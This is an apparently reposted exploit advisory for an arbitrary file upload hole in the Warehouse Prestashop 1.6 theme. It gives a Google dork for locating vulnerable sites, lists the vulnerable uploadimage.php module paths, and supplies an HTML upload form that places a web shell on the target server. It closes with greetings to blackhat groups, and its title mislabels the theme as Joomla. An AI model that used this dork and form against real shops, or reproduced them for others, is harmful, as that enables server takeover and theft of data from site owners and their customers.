Sunday, February 5, 2017
Warehouse Responsive Prestashop 1 6 Arbitrary File Upload
Warehouse Responsive Prestashop 1 6 Arbitrary File Upload
#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Google Dork: inurl:"/modules/productpageadverts/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Warehouse is a clean, powerfull HTML5 responsive prestashop theme.
Warehouse utilizes many advanced modules and modifications like(rollover images, clean cart, sliders, autocomplete, dialogs). Theme is SEO friendly and is Cross Browser compatible, it’s based on prestashop 1.6 default Bootstrap theme
Warehouse utilizes many advanced modules and modifications like(rollover images, clean cart, sliders, autocomplete, dialogs). Theme is SEO friendly and is Cross Browser compatible, it’s based on prestashop 1.6 default Bootstrap theme
Vulnerability :
site /modules/columnadverts/uploadimage.php
site /modules/homepageadvertise/uploadimage.php
site /modules/productpageadverts/uploadimage.php
site /modules/simpleslideshow/uploadimage.php
site /modules/columnadverts/uploadimage.php
site /modules/homepageadvertise/uploadimage.php
site /modules/productpageadverts/uploadimage.php
site /modules/simpleslideshow/uploadimage.php
CSRF
<form method="POST" action="http://website/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
If Succesfully > shell.xxx
Shell Acces ? Click Here
by people_hurt
Greetzzzz : jatim blackhat - surabaya hackerlink - surabaya blackhat and youAvailable link for download
